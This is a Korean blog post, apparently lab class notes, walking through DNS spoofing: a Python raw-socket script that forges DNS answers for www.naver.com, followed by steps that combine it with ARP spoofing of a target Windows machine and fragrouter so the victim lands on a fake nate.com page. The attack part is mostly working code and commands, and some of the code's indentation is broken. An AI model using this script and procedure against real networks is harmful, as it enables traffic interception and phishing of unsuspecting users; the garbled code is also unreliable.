DNS Spoofing

티스토리 뷰

Network Security/Network

DNS Spoofing

HNNN 2018. 1. 29. 16:06

1) 가짜 응답 받아오기 dns_spoofing 실행

#vi dns_spoofing.py

from socket import*
import struct
import ip as _ip
import udp as _udp
import dns as _dns
import eth as _eth

def make_chksum(header):

        size=len(header)
        if (size %2) !=0 :
                header=header+b'\x00'
                size=len(header)

header=struct.unpack('!'+str(size//2)+'H',header)
chksum=sum(header)

        carry=chksum & 0b_1111_1111_0000_0000_0000_0000
        carry = chksum >> 16
        while carry !=0:
                chksum =chksum & 0b_0000_0000_1111_1111_1111_1111
                chksum =chksum +carry
                carry=chksum & 0b_1111_1111_0000_0000_0000_0000
                carry = chksum >> 16
        chksum =chksum ^ 0b_1111_1111_1111_1111
        return chksum

sock=socket(AF_PACKET,SOCK_RAW)
sock.bind(('eth0',SOCK_RAW))

client_port=0
trx_id=0
ip_src=''
ip_dst=''
eth_src=''
eth_dst=''

while True:
(raw,_)=sock.recvfrom(65535)
eth=_eth.Eth(raw[:14])
if eth.type == '0x0800':
  ip=_ip.Ip(raw[14:34])
  if ip.type==17:
   udp=_udp.Udp(raw[34:42])
   if udp.dst==53:
    dns=_dns.Dns(raw[42:54])
    query=raw[54:]
    query=query.split(b'\x00')
    query=query[0]
    query_name=''
    for x in query:
     if 97 <=x <= 122:
      query_name +=chr(x)
     else:
      query_name += '.'
    query_name=query_name[1:]
    print(query_name)

    if query_name=='www.naver.com':
     trx_id=dns.id
     client_port=udp.src
     ip_src=ip.src
     ip_dst=ip.dst
     eth_src=eth.src
     eth_dst=eth.dst

     eth=_eth.Eth()
     ip=_ip.Ip()
     udp=_udp.Udp()
     dns=_dns.Dns()

     dns.set_id(trx_id)
     dns.set_flag(0x8000) # flag 마지막 번호만 킨 것
     dns.set_question(1)
     dns.set_answer(1) #응답을 받아오므로 1
     dns.set_authority(0)
     dns.set_additional(0)

     dns.query = b'\x03www\x05naver\x03com\x00'#name
     dns.query += b'\x00\x01' #type
     dns.query +=b'\x00\x01' #class

     dns.ans=b'\x03www\x05naver\x03com\x00'
     dns.ans+=b'\x00\x01' #type
     dns.ans+=b'\x00\x01'#class
     dns.ans +=b'\x00\x00\x00\x02' # 2초 정도
     dns.ans +=b'\x00\x04' # ipv4
     dns.ans +=b'\xc0\xa8\x04\x9a' # ip주소

     udp.set_src(53)
     udp.set_dst(client_port)
     udp.set_len(0)
     udp.set_chksum(0)
     udp.set_data(dns.get_header()+dns.query+dns.ans)
     udp.set_len(len(udp.get_header()))

     ip.set_ver(4)
     ip.set_len(20)
     ip.set_total_length(len(udp.get_header())+20)
     ip.set_id(0)
     ip.set_type(17)
     ip.set_ttl(64)
     ip.set_flag(0)
     ip.set_offset(0)
     ip.set_chksum(0)
     ip.set_src(ip_dst)
     ip.set_dst(ip_src)
     ip.set_chksum(make_chksum(ip.get_header()))

pseudo=ip.src+ip.dst+b'\x00'+ ip.type+udp.len+udp.get_header()
udp.set_chksum(make_chksum(pseudo))

     eth.set_dst(eth_src)
     eth.set_src(eth_dst)
     eth.set_type('0x0800')

sock.send(eth.get_header()+ip.get_header()+udp.get_header())

2) service named stop # 캐쉬서버 동작막아놈
3) cmd >
   nslookup
   >server 192.168.4.115
   >www.naver.com
   권한없는 응답
   192.168.4.154의 아이피가 나와야함
   ( fake 응답 )

또는 > 네트워크 설정 dns 아이피 192.168.4.115로 변환

번외) 다른버전

#vi tmp.py (도메인 따오는 것 )
tmp= b'\x03www\x05naver\x03com'
i=0
size =len(query)
domain=''
while i < size:
     sub=query[i]
     domain+='.'
     for j in range(i+1,i+sub+1):domain+=chr(query[j])
     print(i,j,sub)
     i+=sub+1
print(domain[1:])

  1) 쿼리 요청
  2) 쿼리 요청분석
   - 도메인 추출
  3) 가짜응답
   주소 : 192.168.4.115
   (hex 로 변환후 사용)

  4) service named stop
  python3 dns_spoofing.py 사용
  cmd > nslookup
   > www.naver.com
  (네트워크 dns 서버 변환 192.168.4.115)

-Arp Spoofing 과 같이 사용

> 가짜 서버 : 192.168.4.154

> 네이버는 보호가 걸려있으므로 nate.com으로 사용

1) ARP Spoofing (공격자쪽으로 패킷이 오도록)
  - dns : 168.126.63.1, 8.8.8.8
( 보통의 dns 주소 )
  - target : 192.168.4.234 (window)
  - 게이트 웨이 : 192.168.4.1

#vi arping.py

>> client(victim) --> attacker
     (내부서버에 같이 있어야함-> arping spoofing을 할것이기 때문이다 )
       client ---> 외부의 dns 접속 (ip를물어옴)
             >>게이트웨이를 통해서 dns 접속
       client ---> attacker --> dns
  (게이트웨이를 arp Spoofing 한다)

2) python3 arping.py
arp -a 의 (cmd)에서 확인

3) python3 dns_spoofing.py

#vi dns_spooding.py 위의 코드 참조

4) python3 fragrouter -B1
  >ipconfig /flushdns #dns 케쉬를 비움

[   dns_spoofing 실행방법 ]

1) arping spoofing 을 먼저 해준다

2-1)#fragrouter -B1 실행

3) 192.168.4.234( target ) cmd 에서 arp -a 한후
게이트웨이의 맥 주소가 나의 맥 주소로 변환 되었는지 확인 #arp spoofing 결과

4) 192.168.4.234의 윈도우에서 ( explore창 )
www.nate.com 이라는 주소를 치면 fake page 가 나오는지 확인

주의할점!
--> sleep 걸어줘야함 (과도한 트레픽이 감)
--> 브로드 케스트 사용하지 않기

#vi arping.py 에서

eth.set_dst('d0:50:99:7b:97:4c') #이부분을 브로드 케스트로 사용하면 안됨
eth.set_src('00:0c:29:10:01:15')
eth.set_type('0x0806')

--> 게이트웨이 맥 주소사용하지 않기 (직접사용 안됨)

arp.set_sender_mac('00:0c:29:10:01:15') # 공격자의 mac 주소 사용

! 게이트 웨이 맥 주소 사용하면 안됨
arp.set_sender_ip('192.168.4.1') #게이트 웨이 사용
arp.set_target_mac('00:00:00:00:00:00')
arp.set_target_ip('192.168.4.234') #상대방 win 아이피

dns spoofing을 당하면 알아낼수있는 방법이 없다 (피싱)
--> 요즘 spoofing 대체 방법 : 인증 사이트 사용

저작자표시 비영리 변경금지 (새창열림)

'Network Security > Network' 카테고리의 다른 글

FTP (0)	2018.01.29
DNS 헤더 / 도메인 응답 받아오기-와이어샤크분석 (0)	2018.01.29
DNS Domain 설정 / 권한 위임 (0)	2018.01.22
DNS 서버 구축 ( 캐시 서버 ) (0)	2018.01.19
DHCP-와이어샤크분석 (0)	2018.01.19

공지사항

최근에 올라온 글

최근에 달린 댓글

Total

Today

Yesterday

링크

TAG more

« 2025/07 »
일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

글 보관함

HNNN_IT

티스토리 뷰

DNS Spoofing

'Network Security > Network' 카테고리의 다른 글

티스토리툴바